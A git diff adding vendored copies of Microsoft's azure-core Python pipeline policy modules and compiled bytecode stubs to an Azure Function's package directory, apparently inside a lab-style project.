hasattr(result, "__await__"): + # type ignore on await: https://github.com/python/mypy/issues/7587 + return await result # type: ignore + return result + +async def handle_no_stream_rest_response(response: "RestAsyncHttpResponse") -> None: + """Handle reading and closing of non stream rest responses. + For our new rest responses, we have to call .read() and .close() for our non-stream + responses. This way, we load in the body for users to access. + """ + try: + await response.read() + await response.close() + except Exception as exc: + await response.close() + raise exc diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__init__.py new file mode 100644 index 0000000..6a47853 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__init__.py @@ -0,0 +1,78 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +from ._base import HTTPPolicy, SansIOHTTPPolicy, RequestHistory +from ._authentication import BearerTokenCredentialPolicy, AzureKeyCredentialPolicy, AzureSasCredentialPolicy +from ._custom_hook import CustomHookPolicy +from ._redirect import RedirectPolicy +from ._retry import RetryPolicy, RetryMode +from ._distributed_tracing import DistributedTracingPolicy +from ._universal import ( + HeadersPolicy, + UserAgentPolicy, + NetworkTraceLoggingPolicy, + ContentDecodePolicy, + ProxyPolicy, + HttpLoggingPolicy, + RequestIdPolicy, +) + +__all__ = [ + 'HTTPPolicy', + 'SansIOHTTPPolicy', + 'BearerTokenCredentialPolicy', + 'AzureKeyCredentialPolicy', + 'AzureSasCredentialPolicy', + 'HeadersPolicy', + 'UserAgentPolicy', + 'NetworkTraceLoggingPolicy', + 'ContentDecodePolicy', + 'RetryMode', + 'RetryPolicy', + 'RedirectPolicy', + 'ProxyPolicy', + 'CustomHookPolicy', + 'DistributedTracingPolicy', + 'RequestHistory', + 'HttpLoggingPolicy', + 'RequestIdPolicy', +] + +#pylint: disable=unused-import + +try: + from ._base_async import AsyncHTTPPolicy + from ._authentication_async import AsyncBearerTokenCredentialPolicy + from ._redirect_async import AsyncRedirectPolicy + from ._retry_async import AsyncRetryPolicy + __all__.extend([ + 'AsyncHTTPPolicy', + 'AsyncBearerTokenCredentialPolicy', + 'AsyncRedirectPolicy', + 'AsyncRetryPolicy' + ]) +except (ImportError, SyntaxError): + pass # Async not supported diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..b0b8749 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_authentication.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_authentication.cpython-39.pyc new file mode 100644 index 0000000..cfed4e5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_authentication.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_authentication_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_authentication_async.cpython-39.pyc new file mode 100644 index 0000000..2efa6b6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_authentication_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_base.cpython-39.pyc new file mode 100644 index 0000000..8c15ca1 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_base_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_base_async.cpython-39.pyc new file mode 100644 index 0000000..d2d9c17 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_base_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_custom_hook.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_custom_hook.cpython-39.pyc new file mode 100644 index 0000000..8d07bef Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_custom_hook.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_distributed_tracing.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_distributed_tracing.cpython-39.pyc new file mode 100644 index 0000000..717d017 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_distributed_tracing.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_redirect.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_redirect.cpython-39.pyc new file mode 100644 index 0000000..e44c2eb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_redirect.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_redirect_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_redirect_async.cpython-39.pyc new file mode 100644 index 0000000..853b11d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_redirect_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_retry.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_retry.cpython-39.pyc new file mode 100644 index 0000000..f5d0ff8 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_retry.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_retry_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_retry_async.cpython-39.pyc new file mode 100644 index 0000000..2581086 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_retry_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_universal.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_universal.cpython-39.pyc new file mode 100644 index 0000000..9ebe714 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_universal.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_utils.cpython-39.pyc new file mode 100644 index 0000000..9c77ccf Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/__pycache__/_utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_authentication.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_authentication.py new file mode 100644 index 0000000..d3833bd --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_authentication.py @@ -0,0 +1,225 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See LICENSE.txt in the project root for +# license information. +# ------------------------------------------------------------------------- +import time +import six + +from . import HTTPPolicy, SansIOHTTPPolicy +from ...exceptions import ServiceRequestError + +try: + from typing import TYPE_CHECKING # pylint:disable=unused-import +except ImportError: + TYPE_CHECKING = False + +if TYPE_CHECKING: + # pylint:disable=unused-import + from typing import Any, Dict, Optional + from azure.core.credentials import AccessToken, TokenCredential, AzureKeyCredential, AzureSasCredential + from azure.core.pipeline import PipelineRequest, PipelineResponse + + +# pylint:disable=too-few-public-methods +class _BearerTokenCredentialPolicyBase(object): + """Base class for a Bearer Token Credential Policy. + + :param credential: The credential. + :type credential: ~azure.core.credentials.TokenCredential + :param str scopes: Lets you specify the type of access needed. + """ + + def __init__(self, credential, *scopes, **kwargs): # pylint:disable=unused-argument + # type: (TokenCredential, *str, **Any) -> None + super(_BearerTokenCredentialPolicyBase, self).__init__() + self._scopes = scopes + self._credential = credential + self._token = None # type: Optional[AccessToken] + + @staticmethod + def _enforce_https(request): + # type: (PipelineRequest) -> None + + # move 'enforce_https' from options to context so it persists + # across retries but isn't passed to a transport implementation + option = request.context.options.pop("enforce_https", None) + + # True is the default setting; we needn't preserve an explicit opt in to the default behavior + if option is False: + request.context["enforce_https"] = option + + enforce_https = request.context.get("enforce_https", True) + if enforce_https and not request.http_request.url.lower().startswith("https"): + raise ServiceRequestError( + "Bearer token authentication is not permitted for non-TLS protected (non-https) URLs." + ) + + @staticmethod + def _update_headers(headers, token): + # type: (Dict[str, str], str) -> None + """Updates the Authorization header with the bearer token. + + :param dict headers: The HTTP Request headers + :param str token: The OAuth token. + """ + headers["Authorization"] = "Bearer {}".format(token) + + @property + def _need_new_token(self): + # type: () -> bool + return not self._token or self._token.expires_on - time.time() < 300 + + +class BearerTokenCredentialPolicy(_BearerTokenCredentialPolicyBase, HTTPPolicy): + """Adds a bearer token Authorization header to requests. + + :param credential: The credential. + :type credential: ~azure.core.TokenCredential + :param str scopes: Lets you specify the type of access needed. + :raises: :class:`~azure.core.exceptions.ServiceRequestError` + """ + + def on_request(self, request): + # type: (PipelineRequest) -> None + """Called before the policy sends a request. + + The base implementation authorizes the request with a bearer token. + + :param ~azure.core.pipeline.PipelineRequest request: the request + """ + self._enforce_https(request) + + if self._token is None or self._need_new_token: + self._token = self._credential.get_token(*self._scopes) + self._update_headers(request.http_request.headers, self._token.token) + + def authorize_request(self, request, *scopes, **kwargs): + # type: (PipelineRequest, *str, **Any) -> None + """Acquire a token from the credential and authorize the request with it. + + Keyword arguments are passed to the credential's get_token method. The token will be cached and used to + authorize future requests. + + :param ~azure.core.pipeline.PipelineRequest request: the request + :param str scopes: required scopes of authentication + """ + self._token = self._credential.get_token(*scopes, **kwargs) + self._update_headers(request.http_request.headers, self._token.token) + + def send(self, request): + # type: (PipelineRequest) -> PipelineResponse + """Authorize request with a bearer token and send it to the next policy + + :param request: The pipeline request object + :type request: ~azure.core.pipeline.PipelineRequest + """ + self.on_request(request) + try: + response = self.next.send(request) + self.on_response(request, response) + except Exception: # pylint:disable=broad-except + self.on_exception(request) + raise + else: + if response.http_response.status_code == 401: + self._token = None # any cached token is invalid + if "WWW-Authenticate" in response.http_response.headers: + request_authorized = self.on_challenge(request, response) + if request_authorized: + try: + response = self.next.send(request) + self.on_response(request, response) + except Exception: # pylint:disable=broad-except + self.on_exception(request) + raise + + return response + + def on_challenge(self, request, response): + # type: (PipelineRequest, PipelineResponse) -> bool + """Authorize request according to an authentication challenge + + This method is called when the resource provider responds 401 with a WWW-Authenticate header. + + :param ~azure.core.pipeline.PipelineRequest request: the request which elicited an authentication challenge + :param ~azure.core.pipeline.PipelineResponse response: the resource provider's response + :returns: a bool indicating whether the policy should send the request + """ + # pylint:disable=unused-argument,no-self-use + return False + + def on_response(self, request, response): + # type: (PipelineRequest, PipelineResponse) -> None + """Executed after the request comes back from the next policy. + + :param request: Request to be modified after returning from the policy. + :type request: ~azure.core.pipeline.PipelineRequest + :param response: Pipeline response object + :type response: ~azure.core.pipeline.PipelineResponse + """ + + def on_exception(self, request): + # type: (PipelineRequest) -> None + """Executed when an exception is raised while executing the next policy. + + This method is executed inside the exception handler. + + :param request: The Pipeline request object + :type request: ~azure.core.pipeline.PipelineRequest + """ + # pylint: disable=no-self-use,unused-argument + return + + +class AzureKeyCredentialPolicy(SansIOHTTPPolicy): + """Adds a key header for the provided credential. + + :param credential: The credential used to authenticate requests. + :type credential: ~azure.core.credentials.AzureKeyCredential + :param str name: The name of the key header used for the credential. + :raises: ValueError or TypeError + """ + def __init__(self, credential, name, **kwargs): # pylint: disable=unused-argument + # type: (AzureKeyCredential, str, **Any) -> None + super(AzureKeyCredentialPolicy, self).__init__() + self._credential = credential + if not name: + raise ValueError("name can not be None or empty") + if not isinstance(name, six.string_types): + raise TypeError("name must be a string.") + self._name = name + + def on_request(self, request): + request.http_request.headers[self._name] = self._credential.key + + +class AzureSasCredentialPolicy(SansIOHTTPPolicy): + """Adds a shared access signature to query for the provided credential. + + :param credential: The credential used to authenticate requests. + :type credential: ~azure.core.credentials.AzureSasCredential + :raises: ValueError or TypeError + """ + def __init__(self, credential, **kwargs): # pylint: disable=unused-argument + # type: (AzureSasCredential, **Any) -> None + super(AzureSasCredentialPolicy, self).__init__() + if not credential: + raise ValueError("credential can not be None") + self._credential = credential + + def on_request(self, request): + url = request.http_request.url + query = request.http_request.query + signature = self._credential.signature + if signature.startswith("?"): + signature = signature[1:] + if query: + if signature not in url: + url = url + "&" + signature + else: + if url.endswith("?"): + url = url + signature + else: + url = url + "?" + signature + request.http_request.url = url diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_authentication_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_authentication_async.py new file mode 100644 index 0000000..ba8ca42 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_authentication_async.py @@ -0,0 +1,130 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See LICENSE.txt in the project root for +# license information. +# ------------------------------------------------------------------------- +import asyncio +import time +from typing import TYPE_CHECKING + +from azure.core.pipeline.policies import AsyncHTTPPolicy +from azure.core.pipeline.policies._authentication import _BearerTokenCredentialPolicyBase + +from .._tools_async import await_result + +if TYPE_CHECKING: + from typing import Any, Awaitable, Optional, Union + from azure.core.credentials import AccessToken + from azure.core.credentials_async import AsyncTokenCredential + from azure.core.pipeline import PipelineRequest, PipelineResponse + + +class AsyncBearerTokenCredentialPolicy(AsyncHTTPPolicy): + """Adds a bearer token Authorization header to requests. + + :param credential: The credential. + :type credential: ~azure.core.credentials.TokenCredential + :param str scopes: Lets you specify the type of access needed. + """ + + def __init__(self, credential: "AsyncTokenCredential", *scopes: str, **kwargs: "Any") -> None: + # pylint:disable=unused-argument + super().__init__() + self._credential = credential + self._lock = asyncio.Lock() + self._scopes = scopes + self._token = None # type: Optional[AccessToken] + + async def on_request(self, request: "PipelineRequest") -> None: # pylint:disable=invalid-overridden-method + """Adds a bearer token Authorization header to request and sends request to next policy. + + :param request: The pipeline request object to be modified. + :type request: ~azure.core.pipeline.PipelineRequest + :raises: :class:`~azure.core.exceptions.ServiceRequestError` + """ + _BearerTokenCredentialPolicyBase._enforce_https(request) # pylint:disable=protected-access + + if self._token is None or self._need_new_token(): + async with self._lock: + # double check because another coroutine may have acquired a token while we waited to acquire the lock + if self._token is None or self._need_new_token(): + self._token = await self._credential.get_token(*self._scopes) + request.http_request.headers["Authorization"] = "Bearer " + self._token.token + + async def authorize_request(self, request: "PipelineRequest", *scopes: str, **kwargs: "Any") -> None: + """Acquire a token from the credential and authorize the request with it. + + Keyword arguments are passed to the credential's get_token method. The token will be cached and used to + authorize future requests. + + :param ~azure.core.pipeline.PipelineRequest request: the request + :param str scopes: required scopes of authentication + """ + async with self._lock: + self._token = await self._credential.get_token(*scopes, **kwargs) + request.http_request.headers["Authorization"] = "Bearer " + self._token.token + + async def send(self, request: "PipelineRequest") -> "PipelineResponse": + """Authorize request with a bearer token and send it to the next policy + + :param request: The pipeline request object + :type request: ~azure.core.pipeline.PipelineRequest + """ + await await_result(self.on_request, request) + try: + response = await self.next.send(request) + await await_result(self.on_response, request, response) + except Exception: # pylint:disable=broad-except + handled = await await_result(self.on_exception, request) + if not handled: + raise + else: + if response.http_response.status_code == 401: + self._token = None # any cached token is invalid + if "WWW-Authenticate" in response.http_response.headers: + request_authorized = await self.on_challenge(request, response) + if request_authorized: + try: + response = await self.next.send(request) + await await_result(self.on_response, request, response) + except Exception: # pylint:disable=broad-except + handled = await await_result(self.on_exception, request) + if not handled: + raise + + return response + + async def on_challenge(self, request: "PipelineRequest", response: "PipelineResponse") -> bool: + """Authorize request according to an authentication challenge + + This method is called when the resource provider responds 401 with a WWW-Authenticate header. + + :param ~azure.core.pipeline.PipelineRequest request: the request which elicited an authentication challenge + :param ~azure.core.pipeline.PipelineResponse response: the resource provider's response + :returns: a bool indicating whether the policy should send the request + """ + # pylint:disable=unused-argument,no-self-use + return False + + def on_response(self, request: "PipelineRequest", response: "PipelineResponse") -> "Union[None, Awaitable[None]]": + """Executed after the request comes back from the next policy. + + :param request: Request to be modified after returning from the policy. + :type request: ~azure.core.pipeline.PipelineRequest + :param response: Pipeline response object + :type response: ~azure.core.pipeline.PipelineResponse + """ + + def on_exception(self, request: "PipelineRequest") -> None: + """Executed when an exception is raised while executing the next policy. + + This method is executed inside the exception handler. + + :param request: The Pipeline request object + :type request: ~azure.core.pipeline.PipelineRequest + """ + # pylint: disable=no-self-use,unused-argument + return + + def _need_new_token(self) -> bool: + return not self._token or self._token.expires_on - time.time() < 300 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_base.py new file mode 100644 index 0000000..49b245a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_base.py @@ -0,0 +1,149 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import abc +import copy +import logging + +from typing import ( + Generic, + TypeVar, + Union, + Any, + Dict, + Optional, +) # pylint: disable=unused-import + +try: + from typing import Awaitable # pylint: disable=unused-import +except ImportError: + pass + +from azure.core.pipeline import ABC, PipelineRequest, PipelineResponse + + +HTTPResponseType = TypeVar("HTTPResponseType") +HTTPRequestType = TypeVar("HTTPRequestType") + +_LOGGER = logging.getLogger(__name__) + +class HTTPPolicy(ABC, Generic[HTTPRequestType, HTTPResponseType]): + """An HTTP policy ABC. + + Use with a synchronous pipeline. + + :param next: Use to process the next policy in the pipeline. Set when pipeline is + instantiated and all policies chained. + :type next: ~azure.core.pipeline.policies.HTTPPolicy or ~azure.core.pipeline.transport.HttpTransport + """ + + def __init__(self): + self.next = None # type: Union[HTTPPolicy, HttpTransport] + + @abc.abstractmethod + def send(self, request): + # type: (PipelineRequest) -> PipelineResponse + """Abstract send method for a synchronous pipeline. Mutates the request. + + Context content is dependent on the HttpTransport. + + :param request: The pipeline request object + :type request: ~azure.core.pipeline.PipelineRequest + :return: The pipeline response object. + :rtype: ~azure.core.pipeline.PipelineResponse + """ + + +class SansIOHTTPPolicy(Generic[HTTPRequestType, HTTPResponseType]): + """Represents a sans I/O policy. + + SansIOHTTPPolicy is a base class for policies that only modify or + mutate a request based on the HTTP specification, and do not depend + on the specifics of any particular transport. SansIOHTTPPolicy + subclasses will function in either a Pipeline or an AsyncPipeline, + and can act either before the request is done, or after. + You can optionally make these methods coroutines (or return awaitable objects) + but they will then be tied to AsyncPipeline usage. + """ + + def on_request(self, request): + # type: (PipelineRequest) -> Union[None, Awaitable[None]] + """Is executed before sending the request from next policy. + + :param request: Request to be modified before sent from next policy. + :type request: ~azure.core.pipeline.PipelineRequest + """ + + def on_response(self, request, response): + # type: (PipelineRequest, PipelineResponse) -> Union[None, Awaitable[None]] + """Is executed after the request comes back from the policy. + + :param request: Request to be modified after returning from the policy. + :type request: ~azure.core.pipeline.PipelineRequest + :param response: Pipeline response object + :type response: ~azure.core.pipeline.PipelineResponse + """ + + # pylint: disable=no-self-use + def on_exception(self, request): # pylint: disable=unused-argument + # type: (PipelineRequest) -> None + """Is executed if an exception is raised while executing the next policy. + + This method is executed inside the exception handler. + + :param request: The Pipeline request object + :type request: ~azure.core.pipeline.PipelineRequest + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_sansio.py + :start-after: [START on_exception] + :end-before: [END on_exception] + :language: python + :dedent: 4 + """ + return + + +class RequestHistory(object): + """A container for an attempted request and the applicable response. + + This is used to document requests/responses that resulted in redirected/retried requests. + + :param http_request: The request. + :type http_request: ~azure.core.pipeline.transport.HttpRequest + :param http_response: The HTTP response. + :type http_response: ~azure.core.pipeline.transport.HttpResponse + :param Exception error: An error encountered during the request, or None if the response was received successfully. + :param dict context: The pipeline context. + """ + + def __init__(self, http_request, http_response=None, error=None, context=None): + # type: (HTTPRequestType, Optional[HTTPResponseType], Exception, Optional[Dict[str, Any]]) -> None + self.http_request = copy.deepcopy(http_request) + self.http_response = http_response + self.error = error + self.context = context diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_base_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_base_async.py new file mode 100644 index 0000000..7d3c046 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_base_async.py @@ -0,0 +1,77 @@ + +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import abc + +from typing import Generic, TypeVar, Union, Any, cast + +from azure.core.pipeline import PipelineRequest + +try: + from contextlib import AbstractAsyncContextManager # type: ignore #pylint: disable=unused-import +except ImportError: # Python <= 3.7 + class AbstractAsyncContextManager(object): # type: ignore + async def __aenter__(self): + """Return `self` upon entering the runtime context.""" + return self + + @abc.abstractmethod + async def __aexit__(self, exc_type, exc_value, traceback): + """Raise any exception triggered within the runtime context.""" + return None + + +AsyncHTTPResponseType = TypeVar("AsyncHTTPResponseType") +HTTPResponseType = TypeVar("HTTPResponseType") +HTTPRequestType = TypeVar("HTTPRequestType") + + +class AsyncHTTPPolicy(abc.ABC, Generic[HTTPRequestType, AsyncHTTPResponseType]): + """An async HTTP policy ABC. + + Use with an asynchronous pipeline. + + :param next: Use to process the next policy in the pipeline. Set when pipeline + is instantiated and all policies chained. + :type next: ~azure.core.pipeline.policies.AsyncHTTPPolicy or ~azure.core.pipeline.transport.AsyncHttpTransport + """ + def __init__(self) -> None: + # next will be set once in the pipeline + from ..transport._base_async import AsyncHttpTransport + self.next = cast(Union[AsyncHTTPPolicy, + AsyncHttpTransport], None) + + @abc.abstractmethod + async def send(self, request: PipelineRequest): + """Abstract send method for a asynchronous pipeline. Mutates the request. + + Context content is dependent on the HttpTransport. + + :param request: The pipeline request object. + :type request: ~azure.core.pipeline.PipelineRequest + :return: The pipeline response object. + :rtype: ~azure.core.pipeline.PipelineResponse + """ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_custom_hook.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_custom_hook.py new file mode 100644 index 0000000..1b81aeb --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_custom_hook.py @@ -0,0 +1,73 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from azure.core.pipeline import PipelineRequest, PipelineResponse +from ._base import SansIOHTTPPolicy + +class CustomHookPolicy(SansIOHTTPPolicy): + """A simple policy that enable the given callback + with the response. + + :keyword callback raw_request_hook: Callback function. Will be invoked on request. + :keyword callback raw_response_hook: Callback function. Will be invoked on response. + """ + def __init__(self, **kwargs): # pylint: disable=unused-argument,super-init-not-called + self._request_callback = kwargs.get('raw_request_hook') + self._response_callback = kwargs.get('raw_response_hook') + + def on_request(self, request): # pylint: disable=arguments-differ + # type: (PipelineRequest) -> None + """This is executed before sending the request to the next policy. + + :param request: The PipelineRequest object. + :type request: ~azure.core.pipeline.PipelineRequest + """ + request_callback = request.context.options.pop('raw_request_hook', None) + if request_callback: + request.context["raw_request_hook"] = request_callback + request_callback(request) + elif self._request_callback: + self._request_callback(request) + 